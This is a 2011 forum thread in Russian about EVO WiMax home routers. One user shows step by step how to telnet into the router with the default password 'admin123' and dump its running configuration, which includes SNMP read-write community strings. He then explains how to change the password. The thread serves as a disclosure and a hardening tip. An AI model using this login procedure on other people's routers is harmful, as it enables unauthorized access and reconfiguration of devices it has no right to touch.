uForum.uz

uForum.uz (https://uforum.uz/index.php)
-   EVO (https://uforum.uz/forumdisplay.php?f=557)
-   -   Настройка прав доступа и обеспечение дополнительной безопасности в клиентском WiMax-оборудовании EVO (https://uforum.uz/showthread.php?t=15023)

Khasan Karabaev 03.03.2011 23:18

Настройка прав доступа и обеспечение дополнительной безопасности в клиентском WiMax-оборудовании EVO
 
Может я не к теме, но я обнаружил открытый порт 161 у маршрутизатора EVO даже пароль могу сказать, главное не то как я это узнал а главное то что можно удалённо через telnet заходить на маршрутизатор и засорять его, в плод до того что можно все настройки перебить, сам как то экспереминтировал, может причина в этом что не я один нашёл такие уязвимости, и просто хулиганют???

Jo-Jo 04.03.2011 18:49

Цитата:

Сообщение от Khasan (Сообщение 521066)
Может я не к теме, но я обнаружил открытый порт 161 у маршрутизатора EVO даже пароль могу сказать, главное не то как я это узнал а главное то что можно удалённо через telnet заходить на маршрутизатор и засорять его, в плод до того что можно все настройки перебить, сам как то экспереминтировал, может причина в этом что не я один нашёл такие уязвимости, и просто хулиганют???

Хасан, а можно поподробнее о том что вы написали?
Хотя бы скриншотик приложили бы, чтобы не быть голословным. Что-то сомнительно, что так легко можно попасть на их железки.

Ну или можно в личку мне.

Khasan Karabaev 04.03.2011 22:34

Цитата:

Хасан, а можно поподробнее о том что вы написали?
Хотя бы скриншотик приложили бы, чтобы не быть голословным. Что-то сомнительно, что так легко можно попасть на их железки.

Ну или можно в личку мне.
Не знаю, имею ли я право выкладывать инфу на эту тему, но поверте это действительно так!!! если у вас эво, то дайте мне свой айпишник и я вам продемонстрирую!!! узнать ряльный айпишник можно тут: http://www.ip-adress.com/

Khasan Karabaev 04.03.2011 22:53

Цитата:

Хасан, а можно поподробнее о том что вы написали?
Только могу сказать как от этого защититься

Ильдар Тимерханов 05.03.2011 00:17

Цитата:

Сообщение от Khasan (Сообщение 521066)
главное не то как я это узнал а главное то что можно удалённо через telnet заходить на маршрутизатор

Мне кажется это и есть самое интерестное... поделитесь опытом

Concerned 05.03.2011 11:21

Железки - мифы и факты, защита и дыры в ней
 
Недавно якобы был обнаружен открытый порт 161 у маршрутизатора EVO.
Цитата:

Сообщение от Khasan (Сообщение 521066)
Главное то, что можно удалённо через telnet заходить на маршрутизатор и засорять его, в плод до того что можно все настройки перебить

Для старта темы, просим первооткрывателя поделиться деталями информации, пароли, явки, скриншоты...
И если это так - будем вместе пытаться решить проблему, если такая реально существует и вне компетенции админов ЕВО.

Khasan Karabaev 05.03.2011 13:00

Для начало экспериментирую на себе: заходим в панель пуск-Run-cmd:
Действие 1:
Заходим по адресу http://www.ip-adress.com/
Там мы узнают свой айпишник:
My IP address is: 94.141.85.222
My IP Address Location: Tashkent in Uzbekistan
ISP of my IP: Super iMax


Действие 2: заходим в панель пуск-Run-cmd:


Цитата:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Xasan>cd..
C:\Documents and Settings>
Действие 3: прописываем команду telnet 94.141.85.222

Цитата:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Xasan>cd..
C:\Documents and Settings>telnet 94.141.85.222
[ENTER]
Получаем такой вид:
Цитата:

Myudmin System.
Copyright 2007-2009 All rights reserved
Password:
Вводим пароль стандартный пароль - admin123
И заходим в систему:
Цитата:

opyright 2007-2009 All rights reserved
Password: admin123
Myudmin#
Пишем команду: show running-config
Цитата:

Myudmin# show running-config
И получаем ряд настроек, таких как DHCP, можем посмотреть прочие настройки…


Цитата:

Myungmin System.
Copyright 2007-2009 All rights reserved

Password: admin123
Myungmin# show running-config

Current configuration:
!
!
config switch
!
!
!
!
!
vlan mode port-base
!
config l2
!
ip address eth0 192.168.0.1 255.255.255.0
no shutdown eth0
ip address wb0 dhcp
no shutdown wb0
!
!
config
!
dhcp-server start-ip 192.168.0.2
dhcp-server end-ip 192.168.0.250
dhcp-server interface eth0
dhcp-server dns 192.168.0.1
dhcp-server dns2 168.126.63.2
dhcp-server subnet 255.255.255.0
dhcp-server router 192.168.0.1
dhcp-server leasetime 864000
dhcp-server enable
!
sntp server 132.236.56.250 sync-time 86400
sntp timezone plus 5
sntp dst disable
sntp enable
!
syslog enable
!
!
!
!
!
vpn ipsec-passthrough enable
vpn l2tp-passthrough enable
vpn pptp-passthrough enable
!
snmp community 1 public ro
snmp community 2 sateesh1 wo
snmp community 3 private1 rw
snmp trap community myungmin
snmp trap port 161
snmp trap ip 192.168.100.1
http-lang en
upgrade-svr mmfw.evo.uz
http-refesh-time 1
!
config voip
!
interface wb0 transport udp port 5060
proxy address 100.100.100.100 port 5060
no proxy
registrar address 100.100.100.100 port 5060 expires-time 3600
outbound_proxy address 100.100.100.100 port 5060
no realm
phone 1 user-name 1000 disp-name 1000
phone 1 auth id NULL password NULL
phone 1 codec pcmu
phone 1 packperiod 20
phone 1 dtmf inband
phone 1 enable
callfwd 1 number NULL type 0 ring 0
service 1 cid 1 cwt 1 ct 0 dnd 0 3way 0 priv 0
phone 2 user-name 2000 disp-name 2000
phone 2 auth id NULL password NULL
phone 2 codec pcmu
phone 2 packperiod 20
phone 2 dtmf inband
no phone 2 enable
callfwd 2 number NULL type 0 ring 0
service 2 cid 1 cwt 1 ct 0 dnd 0 3way 0 priv 0
voip enable
!
config wibro
wcm pkm-type eap-ttls-mschapv2
no wcm pri-key-passwd
wcm anonymous-id evo@evo.uz
wcm user-id ...............
wcm user-passwd ...........
no wcm ca-file enable
no wcm client-file enable
no wcm private-file enable
wcm pkm-mode enable
no wcm authlog-pcap
no wcm authlog-dec
wb_auto_mode on
wb_auto_mode_retry_to 60
wb_auto_mode_retry_count 30
wb_auto_mode_retry_reset_to 3600
wcm aka-emul k 00:01:02:03:04:05:06:07:08:09:0a:0b:0c:0d:0e:0f
wcm aka-emul opc 0f:0e:0d:0c:0b:0a:09:08:07:06:05:04:03:02:01:00
no nds
!
end
Myungmin#
вот и усё!!! а дальше спецу в этой области будет не трудно разобраться...

Khasan Karabaev 05.03.2011 13:20

Теперь я расскажу, как от этого защититься:
Для начало нам нужно изменить стандартный пароль “admin123” о чём евовцы не говорят, например места стандартного пароля ведем, к примеру пароль – “dostupzapriwyon”
Прописываем команду config
Цитата:

Myungmin System.
Copyright 2007-2009 All rights reserved

Password: admin123
Myungmin#config
Далее заходим в глобальную настройку:
Цитата:

Myungmin<config>#
Пишем команду
Myungmin<config>#enable password (пароль)
В нашем случае это:
Цитата:

Myungmin<config>#enable password dostupzapriwyon
Эсли всё правильно ввели, то должны получить такое:
Цитата:

Myungmin#config
Myungmin<config>#enable password dostupzapriwyon
Myungmin<config>#
Если всё получилось, то тогда выходим с сессии вот так:
Цитата:

Myungmin#config
Myungmin<config>#enable password dostupzapriwyon
Myungmin<config>#exit
Myungmin#exit
И теперь пробуем повторить действие со стандартном паролем а потом со свом…

Khasan Karabaev 05.03.2011 13:27

Если я нарушил закон, то прошу меня простить, но лучше если мы сами будем об этом знать и будем знать как защититься, разве это плохо... чем это сделают другие хулиганы. Прошу прощение за то что не смог поставить скриншоты, честно говоря я не разобрался как их вставлять :shok:

и кстати это ещё не всё, если тему не закроют то могу рассказать ещё интересную инфу про защиту железок EVO

Khasan Karabaev 05.03.2011 13:36

В свою очередь советую установить пароль по сложней, дело в том что существуют ряд программ которые могут быстро расшифровать лёгкий пароль. поверьте мне я в этом толк знаю


Текущее время: 20:28. Часовой пояс GMT +5.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
OOO «Единый интегратор UZINFOCOM»